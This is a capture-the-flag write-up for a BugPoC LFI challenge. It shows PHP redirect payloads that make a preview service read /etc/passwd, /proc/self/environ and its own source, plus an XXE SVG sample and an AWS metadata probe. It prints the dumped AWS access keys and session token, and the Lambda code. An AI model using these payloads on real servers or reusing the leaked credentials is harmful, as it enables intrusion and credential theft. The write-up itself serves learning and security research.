
$ Introduction:
Bugpoc is a bug bounty program that was private at first and is now public. Everyone is hitting Bugpoc to hack their platform. I like the Bugpoc program; I have rarely seen a team with such a high level of professionalism, hacking spirit, and quick response time during the submission process.
We are all excited, and here we are with a new challenge, and this one is different: a local file inclusion (LFI). If you don't know about local file inclusion, here is a link with a quick definition: https://en.wikipedia.org/wiki/File_inclusion_vulnerability
Without further ado, grab a cup of coffee and let’s start hacking!
Challenge information:
The vulnerable page: http://social.buggywebsite.com
Rules: this challenge has one rule, and it's quite simple: find your way to the demon's lair, "/etc/passwd".
$ The web page:
As you can see, there is one input available, with limited options: 1- You can enter text content to share. 2- Or, you can enter a URL to share.

If you enter simple text, all you get are "Twitter" and "Reddit" buttons. On the other hand, if you enter something shareable like a Facebook or Reddit URL, more buttons appear, along with a content preview (see the image above).
So, the questions that came to my mind were: how is the content preview generated? Why does it appear only when we enter a shareable URL? And why is this not the case for simple text?
To answer these, I had to do some research on the subject. I searched on Google and found that it is something related to "HTML meta tags". It wasn't clear at first, because I had never had the chance to hack anything related to meta tags before.
So, I have to say something important here: don't hesitate to talk to the community. Sometimes we spend too much time just to find one keyword, one hint, or something that will lead us to our answers. Asking a friend doesn't make you a cheater; it is much easier and saves plenty of time. Indeed, that's what I did. I asked a friend on Discord (Acut3, a good hacker 👌), and he told me to search for "Open Graph metadata" and that my answers would be there. Later on, Bugpoc published the first hint, which confirmed Acut3's clue.

I was surprised by the meta tags and by the fact that they contain a wealth of information I never thought would be useful to me, until this very day.
<meta charset="UTF-8">
<title>Social Media Sharer</title>
<link href="https://fonts.googleapis.com/css?family=Poppins:400,800" rel="stylesheet">
<link href="style.css" rel="stylesheet">
<script type="text/javascript" async="" src="https://www.google-analytics.com/analytics.js"></script><script src="script-min.js"> </script>
<link rel="shortcut icon" type="image/x-icon" href="favicon.ico">
<meta property="og:type" content="website">
<meta property="og:url" content="http://social.buggywebsite.com/">
<meta property="og:title" content="Buggy Social LFI Challenge">
<meta property="og:description" content="LFI CTF Challenge with cash prizes! Brought to you by bugpoc.com. Submit solutions to hackerone.com/bugpoc.">
<meta property="og:image" content="http://social.buggywebsite.com/ctf-info-img.jpg">
<meta property="twitter:card" content="summary_large_image">
<meta property="twitter:url" content="http://social.buggywebsite.com/">
<meta property="twitter:title" content="Buggy Social LFI Challenge">
<meta property="twitter:description" content="LFI CTF Challenge with cash prizes! Brought to you by bugpoc.com. Submit solutions to hackerone.com/bugpoc.">
<meta property="twitter:image" content="http://social.buggywebsite.com/ctf-info-img.jpg">

As you may have noticed, the meta tags section contains what we call the "Open Graph metadata".
Here is the Wikipedia definition:
The Open Graph protocol, developed by Facebook, enables developers to integrate their pages into Facebook's global mapping/tracking tool, the Social Graph. These pages gain the functionality of other graph objects, including profile links and stream updates for connected users. Open Graph tags in HTML5 might look like this:
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width" />
<meta property="og:title" content="Example title of article" />
<meta property="og:site_name" content="example.com website" />
<meta property="og:type" content="article" />
<meta property="og:url" content="http://example.com/example-title-of-article" />
<meta property="og:image" content="http://example.com/article_thumbnail.jpg" />
What's shown above is an example of Open Graph tags. The "og:image" tag is the most important one, because it occupies the most social feed real estate and it's what you use to represent your content.

Now we know how the content is loaded and how the preview image is generated. This gives us an understanding of how the application works and what the Open Graph meta tags are for. I know, you want to know more …

$ The Server Endpoint:
Using Burp, I entered a shareable Reddit URL, meaning one that has an "og:image". I intercepted the HTTP request, which looked like this:

The server "api.buggywebsite.com" has an endpoint called "website-preview" which takes a URL in a parameter called "url". The server reads the page's metadata and tries to fetch the data it needs from that URL (https://www.reddit.com/r/MMA).
Below is the response:

What's interesting in the response is the Base64-encoded image. The server has no problem fetching the image. Question: what happens if we put a domain we control in the "url" parameter? Huh, I feel like you're thinking about something malicious, aren't you? Hold on there … 😋
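Before we move on, here is roughly what that request/response pair looks like, reconstructed from the endpoint above and the field names that appear later in the dumped Lambda source (the method, headers and values are illustrative):

POST /website-preview HTTP/1.1
Host: api.buggywebsite.com
Content-Type: application/json

{"url": "https://www.reddit.com/r/MMA", "requestTime": 1601900000}

And the response body is JSON along these lines:

{"title": "...", "description": "...", "requestTime": 1601900000, "domain": "www.reddit.com", "image": {"content": "<Base64 image data>", "encoded": true, "mimetype": "image/jpeg"}}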
$ The Malicious Server:
I created an "index.html" on my web server:

In the image, the "og:image" points to my server. The "api.buggywebsite.com" server responds with the Base64-encoded image hosted on my server. Nothing special here …
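The page boils down to something like this (the og:title and og:description values are just placeholders; the "myserver.com/calc/" path matches what is used later in the write-up):

<html>
  <head>
    <meta property="og:title" content="My shared page" />
    <meta property="og:description" content="Just a test page" />
    <meta property="og:image" content="http://myserver.com/calc/img.jpg" />
  </head>
  <body></body>
</html>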
Wait, maybe you're now thinking about putting an SVG file in place of "img.jpg"? Since we can embed XML inside an SVG, there's a good chance of an XXE vulnerability here, right? And by that, I mean we could read "/etc/passwd". If that's what you thought, you're right!!! I thought about it too… 😇
Let's try that idea then. I created an "img.svg" file containing the famous XXE payload:

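A typical version of that payload looks something like this:

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg width="500" height="500" xmlns="http://www.w3.org/2000/svg">
  <text font-size="16" x="0" y="16">&xxe;</text>
</svg>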
I went back to my "index.html" and changed "img.jpg" to "img.svg":

So, let’s send the request to the vulnerable server:
Below is the request:

Below is the response:

What?? The server doesn't process the SVG file at all; it just returns its content … 😕
I tried many different payloads; unfortunately, none of them worked. So, how to put it: the XXE idea, just drop it, it will lead us nowhere. I had to think of something new. I felt I was missing something, and Google wasn't helping much; I went from one website to another, searching here and there for an article, a hint. Unfortunately, I couldn't figure out the next step. I took a break, and later, a question came up …

I once heard someone say: "There is nothing more dangerous than a good question."
What if I put a PHP file in place of the SVG file?
Eureka!! A whole new world of possibilities opened up in front of my eyes:
Since the SVG file isn't processed, what if the PHP file performs a redirection using "header('Location: file:///etc/passwd')", forcing the server to go wherever we want?
Let me show you my idea through a diagram:

So, the idea here was to redirect the vulnerable server to read its internal files by itself.
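In words, the flow is roughly:
1- The attacker sends the "website-preview" request with "url" pointing at the attacker-controlled index.html.
2- The vulnerable server fetches index.html and reads its "og:image" URL, which points at the attacker's PHP script.
3- The PHP script answers with "Location: file:///etc/passwd".
4- The vulnerable server follows the redirect, reads its own /etc/passwd, and returns the content in the preview response.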
I wasn't quite sure about putting a PHP file in the "og:image" meta tag, since I had never seen that before … Nevertheless, in the hacking world we have to try everything, and we have nothing to lose. So let's try that too.
The PHP file will be as follows:
<?php
header("Location: file:///etc/passwd");
?>
This PHP file has a single job: redirect the server to "file:///etc/passwd".
Below is the "index.html":

We create an HTML file from which the server will get what it needs. As you can see, the "og:image" content is now "http://myserver.com/calc/index.php".
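Concretely, the only change compared to the earlier sketch is the "og:image" line, which now points at the PHP script:

<meta property="og:image" content="http://myserver.com/calc/index.php" />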
We call the "website-preview" endpoint again, and surprise!!! 😆

The server checks whether the request contains a valid image URL. In our case, the check failed because we gave it a PHP file. The server has a mechanism that tests the file extension in the URL, and we know very well that there are multiple ways to bypass extension filtering; for example, we can append a "?", "#" or "." after the file name … I'll try the "?" symbol first.
The final URL in the "index.html" page will look like this:
<meta
property="og:image"
content="http://www.myserver.com/calc/index.php?.svg"
/>
We send the request again, and now the server responds with a different error:

A HEAD test??? Is it an HTTP HEAD request? Maybe it's testing the content type? Hmm, interesting … let's find out. I'll request the "index.php" file directly and see what the response looks like and what its "Content-Type" is.

Okay, it's "text/html"; that's the reason behind the "Image Failed HEAD Test". The server now has two check mechanisms: the file extension and the "Content-Type" entity header. Now we have all our answers … don't we?
Going back to the PHP file, we have to return the Content-Type that matches the file extension we put in the "og:image" URL, which in our case is SVG:
<?php
$headers = array(
    'Location' => 'file:///etc/passwd',
    'Content-Type' => 'image/svg',
);
foreach ($headers as $headerType => $headerValue)
{
    header($headerType . ': ' . $headerValue);
}
?>
The PHP code isn't mine; I found it on Stack Overflow. I tested it on my server and it seems to work fine.
This is our last resort ☝. We're tired of this: multiple security layers, multiple obstacles. But you know, a hacker's perseverance never loses against the evil of laziness. 😈
Sending our request, we got the response, and … BOOM !!

Holy *$!?#*!! This time we hit right where we should! "/etc/passwd" is ours; see the dump in Burp. Mission complete!! And this is where our journey ends.
To summarize the steps:
1- We send a request to the vulnerable server containing our URL.
2- The vulnerable server fetches the malicious URL and reads its metadata.
3- The vulnerable server processes the "og:image" URL, whose content is a redirection.
4- The vulnerable server follows the redirection to "file:///etc/passwd", reads its own internal file, and sends the content back to the attacker.

$ Conclusion:
I must admit, the challenge was not that easy! The key was persistence and trying different combinations. Sometimes, asking the right questions is 50% of the answer. Whatever the obstacles, don't just try to think outside the box; think in new boxes.
Sometimes you can't get answers or responses; the upside is that this gives you the opportunity to look inside yourself and bring out your full potential.

This write-up is something that may help others. It can serve as a reference for people interested in the same subject, or curious about hacking methodology. It will also act as a backup for me, a kind of guide for my future findings.
I tried to give as much detail about the steps as I could, to help you build a mental image of the whole hacking process. For those who didn't manage to solve the challenge in time, there will surely be more from Bugpoc. They will do their best to deliver quality hacking content and challenges.
If you have any questions or comments about my write-up or techniques, reach out to me on Twitter. I'll be happy to answer your questions, listen to your ideas, and share my modest knowledge with you.
$ BONUS – AWS Metadata & Source Code:
On the last day of the challenge, Bugpoc announced bonus points for anyone who could reveal the cloud metadata as well as the source code involved in this challenge. Let's solve this one too:
Step 1:
The first thing I did was identify which cloud platform I was targeting. I already knew it was AWS. However, I was wondering which service was being used: EC2 or Lambda?
I tried the famous URL used to extract instance metadata from AWS:
http://169.254.169.254/latest/meta-data
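One way to plug that into the setup we already have is to point the redirect at that address, roughly like this (a sketch of the idea):

<?php
// Sketch: reuse the redirect trick, but aim it at the instance metadata service
header('Location: http://169.254.169.254/latest/meta-data/');
header('Content-Type: image/svg');
?>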
Unfortunately, it didn't work; I got a "connection refused" error. Hmm, the question that came to my mind was: is there any other way to get the metadata from the environment itself, without executing a single command?
After a little googling, I found out that the cloud metadata is also exposed through the process environment, which can be read from "/proc/self/environ". Soooo, let's go mug 'em!!! 😁
Changing the "index.php" to:
<?php
$headers = array(
    'Location' => 'file:///proc/self/environ',
    'Content-Type' => 'image/svg',
);
foreach ($headers as $headerType => $headerValue)
{
    header($headerType . ': ' . $headerValue);
}
?>
I sent the request to the server using Burp and got this response:

Cool !!! Let’s prettify this little angel 👶:
AWS_LAMBDA_FUNCTION_VERSION=$LATEST
AWS_SESSION_TOKEN=IQoJb3JpZ2luX2VjEMj//////////wEaCXVzLXdlc3QtMiJHMEUCIHA6iWmmyeWY/Z0XEzUrBrcwR7PVGuJeqRNHnBHN/6mZAiEAkEOpPunx4c5TuhM4Q/VIeyVQCH9+uzSHkiJOLVNNtmcq2wEI8f//////////ARABGgwwMTA1NDQ0MzkyMTAiDGNVdnhQyYseDG/7KiqvAZNJlIm6R2pGf+A5LwHSd6G6SOXFdk2QldSPGtTdzilRvQHLKDueCh3YyyNeTVmzQakWdDXnuTNvGeDFmt2rwV5GzEL8C+vfP0d1AU1W54SsQ8arOi1y1iIFq4Tbyii1vfrenfu7vmPTeQeS7OUVYcSpunByqfzz699Xog/5nwMpWyCQcMpCXW4DaAubGyB3tDS/WkrOplQbTS8o8f+9XY8xpsPSUwqHycf8gRROVAYw1qry+wU64AHIY/mia4i0wj3IA7texbS3/Xk0lsNiRLqQ4ux3XB5xNV8gtJeB72A5dIKwDG/AUsNTa1aVgT61Z7yDCRmn6s56VS+XhuCjjA0bfjehu5OOLFdbkxx3wso8QU2dwWgJts3pABp370dXcrudYBs2f+p26k2cgO4jEMQfRIgWHL01UoW+vxlqiW6k1siBvqtEKq+QpJRV+KwsqVJD1idCfYaosCH5Vhv47lCH8DOyja4/vy5BMAYMz6ScWXkODbtLvhSXVK5/3o7B5Nz8KbpFMokwozuBsFSaA9dOkYXJKZ88eg==
LAMBDA_TASK_ROOT=/var/task
LD_LIBRARY_PATH=/var/lang/lib:/lib64:/usr/lib64:/var/runtime:/var/runtime/lib:/var/task:/var/task/lib:/opt/lib
AWS_LAMBDA_LOG_GROUP_NAME=/aws/lambda/get-website-preview
AWS_LAMBDA_RUNTIME_API=127.0.0.1:9001
AWS_LAMBDA_LOG_STREAM_NAME=2020/10/06/[$LATEST]a0b4c04d5e0f41988ac407a870abf50d
AWS_EXECUTION_ENV=AWS_Lambda_python3.8
AWS_XRAY_DAEMON_ADDRESS=169.254.79.2:2000
AWS_LAMBDA_FUNCTION_NAME=get-website-preview
PATH=/var/lang/bin:/usr/local/bin:/usr/bin/:/bin:/opt/bin
AWS_DEFAULT_REGION=us-west-2
PWD=/var/task
AWS_SECRET_ACCESS_KEY=mbjyuvpKSKzW49z9YuPutTJ8JqFQNIphsg/cemfh
LANG=en_US.UTF-8
LAMBDA_RUNTIME_DIR=/var/runtime
AWS_REGION=us-west-2
TZ=:UTC
AWS_ACCESS_KEY_ID=ASIAQE5D7L6VFRCHZ662
SHLVL=0
_AWS_XRAY_DAEMON_ADDRESS=169.254.79.2
_AWS_XRAY_DAEMON_PORT=2000
_LAMBDA_TELEMETRY_LOG_FD=3
AWS_XRAY_CONTEXT_MISSING=LOG_ERROR
_HANDLER=lambda_function.lambda_handler
AWS_LAMBDA_FUNCTION_MEMORY_SIZE=512
As we can see, it's a Lambda function. That completes our first mission: we now have the cloud metadata. Great!! ✌
Step 2:
How do we extract the source code from the server?
To answer this, we can clearly see two indicators in the extracted metadata that tell us where the source code lives and under which path:
_HANDLER=lambda_function.lambda_handler
LAMBDA_TASK_ROOT=/var/task
"lambda_handler" is a function inside a Python file called "lambda_function.py", and "LAMBDA_TASK_ROOT" tells us where that file is located. So we have the path and the filename; all that remains is to extract that file from the server.
Changing the "index.php" file to this:
<?php
$headers = array(
    'Location' => 'file:///var/task/lambda_function.py',
    'Content-Type' => 'image/svg',
);
foreach ($headers as $headerType => $headerValue)
{
    header($headerType . ': ' . $headerValue);
}
?>
Sending the request, I got this:

Let's clean up the dump, and here is the final result:
import json
import requests
from bs4 import BeautifulSoup
from urllib.parse import urlparse
import fleep
import base64
import os
import sys
from urllib.request import url2pathname
class LocalFileAdapter(requests.adapters.BaseAdapter):
    """Protocol Adapter to allow Requests to GET file:// URLs

    @todo: Properly handle non-empty hostname portions.
    """

    @staticmethod
    def _chkpath(method, path):
        """Return an HTTP status for the given filesystem path."""
        if method.lower() in ('put', 'delete'):
            return 501, "Not Implemented"  # TODO
        elif method.lower() not in ('get', 'head'):
            return 405, "Method Not Allowed"
        elif os.path.isdir(path):
            return 400, "Path Not A File"
        elif not os.path.isfile(path):
            return 404, "File Not Found"
        elif not os.access(path, os.R_OK):
            return 403, "Access Denied"
        else:
            return 200, "OK"

    def send(self, req, **kwargs):
        # pylint: disable=unused-argument
        """Return the file specified by the given request

        @type req: C{PreparedRequest}
        @todo: Should I bother filling `response.headers` and processing
               If-Modified-Since and friends using `os.stat`?
        """
        path = os.path.normcase(os.path.normpath(url2pathname(req.path_url)))
        response = requests.Response()

        response.status_code, response.reason = self._chkpath(req.method, path)
        if response.status_code == 200 and req.method.lower() != 'head':
            try:
                response.raw = open(path, 'rb')
            except (OSError, IOError) as err:
                response.status_code = 500
                response.reason = str(err)

        if isinstance(req.url, bytes):
            response.url = req.url.decode('utf-8')
        else:
            response.url = req.url

        response.request = req
        response.connection = self

        return response

    def close(self):
        pass


def get_og(url):
    r = requests.get(url, headers={'user-agent': 'Buggybot/1.0'})
    soup = BeautifulSoup(r.text, 'html.parser')
    metas = soup.find_all('meta', attrs={"property": True})
    ogs = {meta['property']: meta['content'] for meta in metas if meta['property'].startswith('og:')}
    return {
        'title': ogs.get('og:title', ''),
        'description': ogs.get('og:description', ''),
        'image_url': ogs.get('og:image', ''),
    }


def get_image_bytes(image_url):
    # set up requests session like stack overflow told me to
    requests_session = requests.session()
    requests_session.mount('file://', LocalFileAdapter())

    # verify the thing we are about to download is an image
    r_head = requests_session.head(image_url, stream=True, headers={'user-agent': 'Buggybot/1.0'})
    if not ('image' in r_head.headers.get('Content-Type') or 'image' in r_head.headers.get('content-type')):
        raise Exception("Image Failed HEAD Test")

    # download thing
    r = requests_session.get(image_url, stream=True, headers={'user-agent': 'Buggybot/1.0'})
    img = r.content
    return img


def get_image_mimetype(image_bytes):
    f = fleep.get(image_bytes)
    if len(f.mime) > 0:
        return f.mime[0]
    else:
        return ''


valid_image_extensions = ['.jpg', '.png', '.gif', '.svg']


def get_image_content(image_url):
    # verify the url has an acceptable extension
    has_valid_extension = any([ext in image_url for ext in valid_image_extensions])

    # verify the url starts with http
    if image_url.startswith('http') and has_valid_extension:
        # download the image content
        image_bytes = get_image_bytes(image_url)
        if image_bytes == None:
            raise Exception('Not Found')

        # check file magic bytes
        mimetype = get_image_mimetype(image_bytes)
        if '.jpg' in image_url and mimetype == 'image/jpeg':
            return (base64.b64encode(image_bytes), True, mimetype)
        elif '.png' in image_url and mimetype == 'image/png':
            return (base64.b64encode(image_bytes), True, mimetype)
        elif '.gif' in image_url and mimetype == 'image/gif':
            return (base64.b64encode(image_bytes), True, mimetype)
        elif '.svg' in image_url:
            # svg is basically a text file. no need to look at magic bytes
            return (image_bytes, False, 'image/svg+xml')
        else:
            raise Exception('Unable to Process Image')
    else:
        raise Exception('Invalid Image URL')


def lambda_handler(event, context):
    try:
        # get url from request
        body = event.get('body', '')
        json_body = json.loads(body)
        url = json_body['url']

        # get the request time
        request_time = int(json_body['requestTime'])

        # get open graph data
        og_data = get_og(url)

        # add the request time
        og_data['requestTime'] = request_time

        # add parsed domain
        og_data['domain'] = urlparse(url).netloc

        if og_data['image_url'] != '':
            try:
                # attempt to download the image content
                (img, needed_encoding, mimetype) = get_image_content(og_data['image_url'])
                img_json = {
                    'content': img.decode(),
                    'encoded': needed_encoding,
                    'mimetype': mimetype
                }
                og_data['image'] = img_json
            except Exception as e:
                og_data['image'] = {'error': str(e)}

        # remove the og:image
        del og_data['image_url']

        return {
            'statusCode': 200,
            'body': json.dumps(og_data),
            'headers': {'access-control-allow-origin': '*'}
        }
    except Exception as e:
        return {
            'statusCode': 400,
            'body': 'Error, unable to fetch website preview',
            'headers': {'access-control-allow-origin': '*'}
        }
We have succeeded in our mission, and now you have a clear idea of the steps involved in this challenge. Reading the source also explains why the exploit works: get_image_content only requires the URL to start with "http" and to contain one of the whitelisted extensions (so "index.php?.svg" passes), the HEAD test only inspects the Content-Type header that our PHP script itself returns (requests does not follow redirects on HEAD requests by default), the ".svg" branch returns the content as-is with no magic-byte check, and because a LocalFileAdapter is mounted for "file://" URLs, the GET request happily follows our redirect to "file:///etc/passwd" and hands the file straight back to us.
$ Miscellaneous – Making the POC using Bugpoc:
YouTube video link: Bugpoc Challenge #3 – How to make the POC
$ Useful links:
https://en.wikipedia.org/wiki/Facebook_Platform#Open_Graph_protocol
https://hackerone.com/reports/309367
https://developer.mozilla.org/MIME_types/Common_types
https://docs.aws.amazon.com/lambda/latest/dg/python-package.html